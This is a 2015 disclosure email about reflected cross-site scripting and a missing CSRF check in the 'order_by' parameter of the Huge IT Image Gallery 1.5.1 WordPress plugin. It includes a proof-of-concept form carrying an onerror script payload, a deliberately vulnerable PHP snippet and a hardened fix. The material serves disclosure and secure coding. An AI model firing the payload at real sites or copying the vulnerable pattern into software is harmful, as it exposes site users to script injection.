Subject: Cross-Site Scripting (XSS) in Huge IT Image Gallery 1.5.1
Date: Thu, 20 Aug 2015 12:10:42 +0200

Hello,

Plugin: Huge IT Image Gallery 1.5.1 https://wordpress.org/plugins/gallery-images/

1. Reflected Cross-Site Scripting (XSS)

Authenticated users (such as editors) can inject HTML/JavaScript code via this parameter; the request also has no CSRF protection.

Method: POST
Url: http://localhost/wp-admin/admin.php?page=gallerys_huge_it_gallery
Vulnerable parameters: order_by

Example PHP callstack:
showgallery   [/gallery-images/admin/gallery_func.php:67]
html_showgallerys   [/gallery-images/admin/gallery_view.php:186]

Verification:
--
<form method="POST" action="http://localhost/wp-admin/admin.php?page=gallerys_huge_it_gallery">
<input type="text" name="order_by" value='"><img src=x onerror=alert(1) />' />
<input type="submit" />
</form>
--
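As an added example, not the plugin's own code, the pattern that produces this class of bug is shown beside a hardened handler built on WordPress's standard nonce, capability and escaping helpers. The function names, the `edit_posts` capability, the nonce action name and the column whitelist are assumptions for illustration; only the admin page slug comes from the advisory above.

```php
<?php
// Added example (not the Huge IT Image Gallery code). Names marked
// "hypothetical" below are assumptions made for this illustration.

/**
 * Vulnerable pattern: request input is echoed straight into an HTML
 * attribute with no validation, no escaping and no CSRF check.
 * A value such as  "><img src=x onerror=...  closes the attribute and
 * injects markup, which is the reflected XSS reported above.
 */
function example_vulnerable_order_field() {   // hypothetical name
    $order_by = isset( $_POST['order_by'] ) ? $_POST['order_by'] : 'id';
    echo '<input type="text" name="order_by" value="' . $order_by . '" />';
}

/**
 * Returns a validated order_by value. Only entries from a fixed whitelist
 * are accepted; anything else falls back to the default, so attacker
 * controlled text never reaches the page at all.
 */
function example_validated_order_by( $raw, array $allowed, $default = 'id' ) {
    $candidate = is_string( $raw ) ? sanitize_key( $raw ) : '';
    return in_array( $candidate, $allowed, true ) ? $candidate : $default;
}

/**
 * Hardened handler: capability check, nonce check (CSRF), whitelist
 * validation of the input, and context-aware output escaping.
 */
function example_handle_gallery_order_request() {   // hypothetical name
    // Only users allowed to manage galleries may reach this code
    // (the required capability is an assumption).
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_die( 'Insufficient permissions' );
    }

    $allowed  = array( 'id', 'name', 'date' );   // hypothetical column names
    $order_by = 'id';

    if ( isset( $_SERVER['REQUEST_METHOD'] ) && 'POST' === $_SERVER['REQUEST_METHOD'] ) {
        // CSRF protection: the form must carry a nonce this plugin issued.
        // check_admin_referer() dies with a 403 if the nonce is missing or wrong.
        check_admin_referer( 'example_gallery_order', 'example_gallery_order_nonce' );

        $raw      = isset( $_POST['order_by'] ) ? wp_unslash( $_POST['order_by'] ) : '';
        $order_by = example_validated_order_by( $raw, $allowed );
    }

    // Output escaping: even whitelisted values are escaped for the context
    // they land in (esc_url for the action URL, esc_attr for attributes,
    // esc_html for element text).
    ?>
    <form method="post"
          action="<?php echo esc_url( admin_url( 'admin.php?page=gallerys_huge_it_gallery' ) ); ?>">
        <?php wp_nonce_field( 'example_gallery_order', 'example_gallery_order_nonce' ); ?>
        <select name="order_by">
            <?php foreach ( $allowed as $col ) : ?>
                <option value="<?php echo esc_attr( $col ); ?>"<?php selected( $order_by, $col ); ?>>
                    <?php echo esc_html( $col ); ?>
                </option>
            <?php endforeach; ?>
        </select>
        <input type="submit" value="<?php echo esc_attr( 'Sort' ); ?>" />
    </form>
    <?php
}
```

The whitelist is the primary fix: a sort column is a closed set, so free-form text never needs to be reflected. The nonce closes the CSRF angle mentioned in the advisory, and escaping on output is kept anyway as defence in depth in case a later change widens what the function accepts.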

--
Regards,
Marcin Probola,